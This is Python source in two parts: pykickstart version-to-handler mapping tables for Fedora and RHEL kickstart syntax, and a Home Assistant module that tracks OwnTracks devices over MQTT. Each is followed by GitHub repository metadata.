"halt": reboot.FC6_Reboot,
"harddrive": method.F13_Method,
"ignoredisk": ignoredisk.F8_IgnoreDisk,
"install": upgrade.F11_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.F10_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.F12_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.F10_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.F9_Network,
"nfs": method.F13_Method,
"part": partition.F12_Partition,
"partition": partition.F12_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F13_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.F13_Repo,
"rescue": rescue.F10_Rescue,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"sshpw": sshpw.F13_SshPw,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.F11_Upgrade,
"url": method.F13_Method,
"user": user.F12_User,
"vnc": vnc.F9_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.F10_XConfig,
"zerombr": zerombr.F9_ZeroMbr,
"zfcp": zfcp.F12_ZFCP,
},
# based on f13
F14: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F12_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.F14_Bootloader,
"cdrom": method.F14_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.F14_DriverDisk,
"fcoe": fcoe.F13_Fcoe,
"firewall": firewall.F14_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"group": group.F12_Group,
"halt": reboot.FC6_Reboot,
"harddrive": method.F14_Method,
"ignoredisk": ignoredisk.F14_IgnoreDisk,
"install": upgrade.F11_Upgrade,
"interactive": interactive.F14_Interactive,
"iscsi": iscsi.F10_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.F14_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.F10_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.F9_Network,
"nfs": method.F14_Method,
"part": partition.F14_Partition,
"partition": partition.F14_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F14_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.F14_Repo,
"rescue": rescue.F10_Rescue,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"sshpw": sshpw.F13_SshPw,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.F11_Upgrade,
"url": method.F14_Method,
"user": user.F12_User,
"vnc": vnc.F9_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.F14_XConfig,
"zerombr": zerombr.F9_ZeroMbr,
"zfcp": zfcp.F14_ZFCP,
},
# based on f14
F15: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F12_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.F15_Bootloader,
"cdrom": method.F14_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.F14_DriverDisk,
"fcoe": fcoe.F13_Fcoe,
"firewall": firewall.F14_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"group": group.F12_Group,
"halt": reboot.FC6_Reboot,
"harddrive": method.F14_Method,
"ignoredisk": ignoredisk.F14_IgnoreDisk,
"install": upgrade.F11_Upgrade,
"iscsi": iscsi.F10_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.F15_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.F10_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.F9_Network,
"nfs": method.F14_Method,
"part": partition.F14_Partition,
"partition": partition.F14_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F15_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.F15_Repo,
"rescue": rescue.F10_Rescue,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"sshpw": sshpw.F13_SshPw,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.F11_Upgrade,
"url": method.F14_Method,
"user": user.F12_User,
"vnc": vnc.F9_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.F14_XConfig,
"zerombr": zerombr.F9_ZeroMbr,
"zfcp": zfcp.F14_ZFCP,
},
# based on f15
F16: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F12_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.F15_Bootloader,
"cdrom": method.F14_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.F14_DriverDisk,
"fcoe": fcoe.F13_Fcoe,
"firewall": firewall.F14_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"group": group.F12_Group,
"halt": reboot.FC6_Reboot,
"harddrive": method.F14_Method,
"ignoredisk": ignoredisk.F14_IgnoreDisk,
"install": upgrade.F11_Upgrade,
"iscsi": iscsi.F10_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.F15_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.F10_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.F16_Network,
"nfs": method.F14_Method,
"part": partition.F14_Partition,
"partition": partition.F14_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F15_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.F15_Repo,
"rescue": rescue.F10_Rescue,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"sshpw": sshpw.F13_SshPw,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.F11_Upgrade,
"url": method.F14_Method,
"user": user.F12_User,
"vnc": vnc.F9_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.F14_XConfig,
"zerombr": zerombr.F9_ZeroMbr,
"zfcp": zfcp.F14_ZFCP,
},
# based on fc1
RHEL3: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.FC3_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.FC3_Bootloader,
"cdrom": method.FC3_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.FC3_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"driverdisk": driverdisk.FC3_DriverDisk,
"firewall": firewall.FC3_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC3_Reboot,
"harddrive": method.FC3_Method,
"ignoredisk": ignoredisk.FC3_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"langsupport": langsupport.FC3_LangSupport,
"lilo": bootloader.FC3_Bootloader,
"lilocheck": lilocheck.FC3_LiloCheck,
"logvol": logvol.FC3_LogVol,
"monitor": monitor.FC3_Monitor,
"mouse": mouse.RHEL3_Mouse,
"network": network.FC3_Network,
"nfs": method.FC3_Method,
"part": partition.FC3_Partition,
"partition": partition.FC3_Partition,
"poweroff": reboot.FC3_Reboot,
"raid": raid.FC3_Raid,
"reboot": reboot.FC3_Reboot,
"rootpw": rootpw.FC3_RootPw,
"shutdown": reboot.FC3_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC3_Timezone,
"upgrade": upgrade.FC3_Upgrade,
"url": method.FC3_Method,
"vnc": vnc.FC3_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.FC3_XConfig,
"zerombr": zerombr.FC3_ZeroMbr,
},
# based on fc3
RHEL4: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.FC3_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.FC3_Bootloader,
"cdrom": method.FC3_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.FC3_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"driverdisk": driverdisk.FC4_DriverDisk,
"firewall": firewall.FC3_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC3_Reboot,
"harddrive": method.FC3_Method,
"ignoredisk": ignoredisk.F8_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"langsupport": langsupport.FC3_LangSupport,
"lilo": bootloader.FC3_Bootloader,
"lilocheck": lilocheck.FC3_LiloCheck,
"logvol": logvol.FC3_LogVol,
"monitor": monitor.FC3_Monitor,
"mouse": mouse.FC3_Mouse,
"network": network.RHEL4_Network,
"nfs": method.FC3_Method,
"part": partition.FC3_Partition,
"partition": partition.FC3_Partition,
"poweroff": reboot.FC3_Reboot,
"raid": raid.FC3_Raid,
"reboot": reboot.FC3_Reboot,
"rootpw": rootpw.FC3_RootPw,
"selinux": selinux.FC3_SELinux,
"shutdown": reboot.FC3_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC3_Timezone,
"upgrade": upgrade.FC3_Upgrade,
"url": method.FC3_Method,
"vnc": vnc.FC3_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.FC3_XConfig,
"zerombr": zerombr.FC3_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on fc6
RHEL5: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F9_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.RHEL5_Bootloader,
"cdrom": method.FC6_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.FC3_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.F12_DriverDisk,
"firewall": firewall.FC3_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC6_Reboot,
"harddrive": method.FC6_Method,
"ignoredisk": ignoredisk.F8_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.FC6_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"key": key.RHEL5_Key,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"langsupport": langsupport.FC5_LangSupport,
"logging": logging.FC6_Logging,
"logvol": logvol.RHEL5_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.FC6_Monitor,
"mouse": mouse.FC3_Mouse,
"multipath": multipath.FC6_MultiPath,
"network": network.RHEL5_Network,
"nfs": method.FC6_Method,
"part": partition.RHEL5_Partition,
"partition": partition.RHEL5_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.RHEL5_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.FC6_Repo,
"rootpw": rootpw.FC3_RootPw,
"services": services.FC6_Services,
"selinux": selinux.FC3_SELinux,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"upgrade": upgrade.FC3_Upgrade,
"user": user.FC6_User,
"url": method.FC6_Method,
"vnc": vnc.FC6_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.FC6_XConfig,
"zerombr": zerombr.FC3_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on f13ish
RHEL6: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F12_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.RHEL6_Bootloader,
"cdrom": method.RHEL6_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.F12_DriverDisk,
"fcoe": fcoe.F13_Fcoe,
"firewall": firewall.F10_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"group": group.F12_Group,
"halt": reboot.FC6_Reboot,
"harddrive": method.RHEL6_Method,
"ignoredisk": ignoredisk.RHEL6_IgnoreDisk,
"install": upgrade.F11_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.F10_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.F12_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.F10_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.RHEL6_Network,
"nfs": method.RHEL6_Method,
"part": partition.F12_Partition,
"partition": partition.F12_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F13_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.RHEL6_Repo,
"rescue": rescue.F10_Rescue,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"sshpw": sshpw.F13_SshPw,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.F11_Upgrade,
"url": method.RHEL6_Method,
"user": user.F12_User,
"vnc": vnc.F9_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.F10_XConfig,
"zerombr": zerombr.F9_ZeroMbr,
"zfcp": zfcp.F12_ZFCP,
}
}
# This map is keyed on kickstart syntax version as provided by
# pykickstart.version. Within each sub-dict is a mapping from a data object
# name to the class that provides it. This is a bijective mapping - that is,
# each name maps to exactly one data class and all data classes have a name.
# More than one instance of each class is allowed to exist, however.
dataMap = {
FC3: {
"DriverDiskData": driverdisk.FC3_DriverDiskData,
"LogVolData": logvol.FC3_LogVolData,
"NetworkData": network.FC3_NetworkData,
"PartData": partition.FC3_PartData,
"RaidData": raid.FC3_RaidData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
FC4: {
"DriverDiskData": driverdisk.FC4_DriverDiskData,
"LogVolData": logvol.FC4_LogVolData,
"NetworkData": network.FC4_NetworkData,
"PartData": partition.FC4_PartData,
"RaidData": raid.FC4_RaidData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
FC5: {
"DriverDiskData": driverdisk.FC4_DriverDiskData,
"LogVolData": logvol.FC4_LogVolData,
"NetworkData": network.FC4_NetworkData,
"PartData": partition.FC4_PartData,
"RaidData": raid.FC5_RaidData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
FC6: {
"DriverDiskData": driverdisk.FC4_DriverDiskData,
"DmRaidData": dmraid.FC6_DmRaidData,
"IscsiData": iscsi.FC6_IscsiData,
"LogVolData": logvol.FC4_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.FC6_NetworkData,
"PartData": partition.FC4_PartData,
"RaidData": raid.FC5_RaidData,
"RepoData": repo.FC6_RepoData,
"UserData": user.FC6_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
F7: {
"DriverDiskData": driverdisk.FC4_DriverDiskData,
"DmRaidData": dmraid.FC6_DmRaidData,
"IscsiData": iscsi.FC6_IscsiData,
"LogVolData": logvol.FC4_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.FC6_NetworkData,
"PartData": partition.FC4_PartData,
"RaidData": raid.F7_RaidData,
"RepoData": repo.FC6_RepoData,
"UserData": user.FC6_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
F8: {
"DriverDiskData": driverdisk.FC4_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"IscsiData": iscsi.FC6_IscsiData,
"LogVolData": logvol.FC4_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.F8_NetworkData,
"PartData": partition.FC4_PartData,
"RaidData": raid.F7_RaidData,
"RepoData": repo.F8_RepoData,
"UserData": user.F8_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
F9: {
"DriverDiskData": driverdisk.FC4_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"IscsiData": iscsi.FC6_IscsiData,
"LogVolData": logvol.F9_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.F8_NetworkData,
"PartData": partition.F9_PartData,
"RaidData": raid.F9_RaidData,
"RepoData": repo.F8_RepoData,
"UserData": user.F8_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
F10: {
"DriverDiskData": driverdisk.FC4_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"IscsiData": iscsi.F10_IscsiData,
"LogVolData": logvol.F9_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.F8_NetworkData,
"PartData": partition.F9_PartData,
"RaidData": raid.F9_RaidData,
"RepoData": repo.F8_RepoData,
"UserData": user.F8_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
F11: {
"DriverDiskData": driverdisk.FC4_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"IscsiData": iscsi.F10_IscsiData,
"LogVolData": logvol.F9_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.F8_NetworkData,
"PartData": partition.F11_PartData,
"RaidData": raid.F9_RaidData,
"RepoData": repo.F11_RepoData,
"UserData": user.F8_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
F12: {
"DriverDiskData": driverdisk.F12_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"FcoeData": fcoe.F12_FcoeData,
"GroupData": group.F12_GroupData,
"IscsiData": iscsi.F10_IscsiData,
"LogVolData": logvol.F12_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.F8_NetworkData,
"PartData": partition.F12_PartData,
"RaidData": raid.F12_RaidData,
"RepoData": repo.F11_RepoData,
"UserData": user.F12_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.F12_ZFCPData,
},
F13: {
"DriverDiskData": driverdisk.F12_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"FcoeData": fcoe.F13_FcoeData,
"GroupData": group.F12_GroupData,
"IscsiData": iscsi.F10_IscsiData,
"LogVolData": logvol.F12_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.F8_NetworkData,
"PartData": partition.F12_PartData,
"RaidData": raid.F13_RaidData,
"RepoData": repo.F13_RepoData,
"SshPwData": sshpw.F13_SshPwData,
"UserData": user.F12_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.F12_ZFCPData,
},
F14: {
"DriverDiskData": driverdisk.F14_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"FcoeData": fcoe.F13_FcoeData,
"GroupData": group.F12_GroupData,
"IscsiData": iscsi.F10_IscsiData,
"LogVolData": logvol.F14_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.F8_NetworkData,
"PartData": partition.F14_PartData,
"RaidData": raid.F14_RaidData,
"RepoData": repo.F14_RepoData,
"SshPwData": sshpw.F13_SshPwData,
"UserData": user.F12_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.F14_ZFCPData,
},
F15: {
"DriverDiskData": driverdisk.F14_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"FcoeData": fcoe.F13_FcoeData,
"GroupData": group.F12_GroupData,
"IscsiData": iscsi.F10_IscsiData,
"LogVolData": logvol.F15_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.F8_NetworkData,
"PartData": partition.F14_PartData,
"RaidData": raid.F15_RaidData,
"RepoData": repo.F15_RepoData,
"SshPwData": sshpw.F13_SshPwData,
"UserData": user.F12_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.F14_ZFCPData,
},
F16: {
"DriverDiskData": driverdisk.F14_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"FcoeData": fcoe.F13_FcoeData,
"GroupData": group.F12_GroupData,
"IscsiData": iscsi.F10_IscsiData,
"LogVolData": logvol.F15_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.F16_NetworkData,
"PartData": partition.F14_PartData,
"RaidData": raid.F15_RaidData,
"RepoData": repo.F15_RepoData,
"SshPwData": sshpw.F13_SshPwData,
"UserData": user.F12_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.F14_ZFCPData,
},
RHEL3: {
"DriverDiskData": driverdisk.FC3_DriverDiskData,
"LogVolData": logvol.FC3_LogVolData,
"NetworkData": network.RHEL4_NetworkData,
"PartData": partition.FC3_PartData,
"RaidData": raid.FC3_RaidData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
RHEL4: {
"DriverDiskData": driverdisk.FC4_DriverDiskData,
"LogVolData": logvol.FC3_LogVolData,
"NetworkData": network.RHEL4_NetworkData,
"PartData": partition.FC3_PartData,
"RaidData": raid.FC3_RaidData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
RHEL5: {
"DriverDiskData": driverdisk.F12_DriverDiskData,
"DmRaidData": dmraid.FC6_DmRaidData,
"IscsiData": iscsi.FC6_IscsiData,
"LogVolData": logvol.RHEL5_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.FC6_NetworkData,
"PartData": partition.RHEL5_PartData,
"RaidData": raid.RHEL5_RaidData,
"RepoData": repo.FC6_RepoData,
"UserData": user.FC6_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
RHEL6: {
"DriverDiskData": driverdisk.F12_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"FcoeData": fcoe.F13_FcoeData,
"GroupData": group.F12_GroupData,
"IscsiData": iscsi.F10_IscsiData,
"LogVolData": logvol.F12_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.RHEL6_NetworkData,
"PartData": partition.F12_PartData,
"RaidData": raid.F13_RaidData,
"RepoData": repo.RHEL6_RepoData,
"SshPwData": sshpw.F13_SshPwData,
"UserData": user.F12_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.F12_ZFCPData,
}
}
|
{
"content_hash": "6db1256484f2488353aff4425156980b",
"timestamp": "",
"source": "github",
"line_count": 1288,
"max_line_length": 77,
"avg_line_length": 38.838509316770185,
"alnum_prop": 0.6096873500719655,
"repo_name": "marcosbontempo/inatelos",
"id": "d8c8f2b89941c7c8de37393b7127e483f6a341b0",
"size": "50993",
"binary": false,
"copies": "10",
"ref": "refs/heads/master",
"path": "poky-daisy/scripts/lib/mic/3rdparty/pykickstart/handlers/control.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "158"
},
{
"name": "BitBake",
"bytes": "1910696"
},
{
"name": "BlitzBasic",
"bytes": "4400"
},
{
"name": "C",
"bytes": "1751572"
},
{
"name": "C++",
"bytes": "354295"
},
{
"name": "CMake",
"bytes": "6537"
},
{
"name": "CSS",
"bytes": "27029"
},
{
"name": "Groff",
"bytes": "502444"
},
{
"name": "HTML",
"bytes": "141762"
},
{
"name": "JavaScript",
"bytes": "22555"
},
{
"name": "Lua",
"bytes": "1194"
},
{
"name": "Makefile",
"bytes": "32254"
},
{
"name": "Nginx",
"bytes": "2744"
},
{
"name": "Perl",
"bytes": "66300"
},
{
"name": "Perl6",
"bytes": "73"
},
{
"name": "Python",
"bytes": "3529760"
},
{
"name": "Shell",
"bytes": "598521"
},
{
"name": "Tcl",
"bytes": "60106"
},
{
"name": "VimL",
"bytes": "8506"
},
{
"name": "XSLT",
"bytes": "8814"
}
],
"symlink_target": ""
}
|
"""
homeassistant.components.device_tracker.owntracks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
OwnTracks platform for the device tracker.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/device_tracker.owntracks/
"""
import json
import logging
import homeassistant.components.mqtt as mqtt
from homeassistant.const import (STATE_HOME, STATE_NOT_HOME)
DEPENDENCIES = ['mqtt']
CONF_TRANSITION_EVENTS = 'use_events'
LOCATION_TOPIC = 'owntracks/+/+'
EVENT_TOPIC = 'owntracks/+/+/event'
def setup_scanner(hass, config, see):
""" Set up an OwnTracks tracker. """
def owntracks_location_update(topic, payload, qos):
""" MQTT message received. """
# Docs on available data:
# http://owntracks.org/booklet/tech/json/#_typelocation
try:
data = json.loads(payload)
except ValueError:
# If invalid JSON
logging.getLogger(__name__).error(
'Unable to parse payload as JSON: %s', payload)
return
if not isinstance(data, dict) or data.get('_type') != 'location':
return
parts = topic.split('/')
kwargs = {
'dev_id': '{}_{}'.format(parts[1], parts[2]),
'host_name': parts[1],
'gps': (data['lat'], data['lon']),
}
if 'acc' in data:
kwargs['gps_accuracy'] = data['acc']
if 'batt' in data:
kwargs['battery'] = data['batt']
see(**kwargs)
def owntracks_event_update(topic, payload, qos):
""" MQTT event (geofences) received. """
# Docs on available data:
# http://owntracks.org/booklet/tech/json/#_typetransition
try:
data = json.loads(payload)
except ValueError:
# If invalid JSON
logging.getLogger(__name__).error(
'Unable to parse payload as JSON: %s', payload)
return
if not isinstance(data, dict) or data.get('_type') != 'transition':
return
# check if in "home" fence or other zone
location = ''
if data['event'] == 'enter':
if data['desc'].lower() == 'home':
location = STATE_HOME
else:
location = data['desc']
elif data['event'] == 'leave':
location = STATE_NOT_HOME
else:
logging.getLogger(__name__).error(
'Misformatted mqtt msgs, _type=transition, event=%s',
data['event'])
return
parts = topic.split('/')
kwargs = {
'dev_id': '{}_{}'.format(parts[1], parts[2]),
'host_name': parts[1],
'gps': (data['lat'], data['lon']),
'location_name': location,
}
if 'acc' in data:
kwargs['gps_accuracy'] = data['acc']
see(**kwargs)
use_events = config.get(CONF_TRANSITION_EVENTS)
if use_events:
mqtt.subscribe(hass, EVENT_TOPIC, owntracks_event_update, 1)
else:
mqtt.subscribe(hass, LOCATION_TOPIC, owntracks_location_update, 1)
return True
|
{
"content_hash": "effaf2392f2853fc8a19fcaac0109083",
"timestamp": "",
"source": "github",
"line_count": 106,
"max_line_length": 75,
"avg_line_length": 29.943396226415093,
